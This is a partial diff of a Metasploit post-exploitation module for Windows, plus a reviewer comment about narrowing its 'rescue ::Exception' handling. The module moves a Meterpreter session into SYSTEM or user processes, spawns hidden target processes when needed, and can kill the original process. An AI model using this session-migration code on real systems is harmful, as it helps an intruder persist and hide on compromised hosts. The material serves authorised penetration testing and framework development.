modules/post/windows/manage/priv_migrate.rb

```diff
@@ -0,0 +1,147 @@
+    print_status("Current session process is #{original_name} (#{original_pid}) as: #{client.sys.config.getuid}")
+
+    # Admin level migration starts here
+    if is_admin?
+      if !is_system?
+        print_status("Session is Admin but not System.")
+        print_status("Will attempt to migrate to a System level process.")
+      else
+        print_status("Session is already Admin and System.")
+        print_status("Will attempt to migrate to specified System level process.")
+      end
+
+      # Try to migrate to each of the System level processes in the list.  Stop when one works.  Go to User level migration if none work.
+      admin_targets.each do |target_name|
+        if migrate(get_pid(target_name), target_name)
+          kill(original_pid, original_name) if datastore['KILL']
+          return
+        end
+      end
+      print_error("Unable to migrate to any of the System level processes.")
+    else
+      print_status("Session has User level rights.")
+    end
+
+    # User level migration starts here
+    print_status("Will attempt to migrate to a User level process.")
+
+    # Try to migrate to user level processes in the list.  If it does not exist or cannot migrate, try spawning it then migrating.
+    user_targets.each do |target_name|
+      if migrate(get_pid(target_name), target_name)
+        kill(original_pid, original_name) if datastore['KILL']
+        return
+      end
+
+      if migrate(spawn(target_name), target_name)
+        kill(original_pid, original_name) if datastore['KILL']
+        return
+      end
+    end
+  end
+
+  # This function returns the first process id of a process with the name provided.
+  # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module.
+  def get_pid(proc_name)
+    processes = client.sys.process.get_processes
+    processes.each do |proc|
+      return proc['pid'] if proc['name'] == proc_name
+    end
+    return nil
+  end
+
+  # This function attempts to migrate to the specified process.
+  def migrate(target_pid, proc_name)
+    if !target_pid
+      print_error("Could not migrate to #{proc_name}.")
+      return false
+    end
+
+    begin
+      print_status("Trying #{proc_name} (#{target_pid})")
+      client.core.migrate(target_pid)
+      print_good("Successfully migrated to #{client.sys.process.open.name} (#{client.sys.process.open.pid}) as: #{client.sys.config.getuid}")
+      return true
+    rescue ::Exception => e
+      print_error("Could not migrate to #{proc_name}.")
+      print_error(e.to_s)
+      return false
+    end
+  end
+
+  # This function will attempt to spawn a new process of the type provided by the name.
+  def spawn(proc_name)
+    begin
+      print_status("Attempting to spawn #{proc_name}")
+      proc = session.sys.process.execute(proc_name, nil, {'Hidden' => true })
+      print_good("Successfully spawned #{proc_name}")
+      return proc.pid
+    rescue ::Exception => e
```

Comment:
I understand you are just following what other modules are doing, but actually it is best to avoid ```rescue ::Exception```, and handle something more specific. In your case, it's probably ```::Rex::Post::Meterpreter::RequestError```, but please feel free to double check.

::Exception should be avoided because you could be rescuing exceptions that should be handled by msfconsole (or some lib), and not by the module.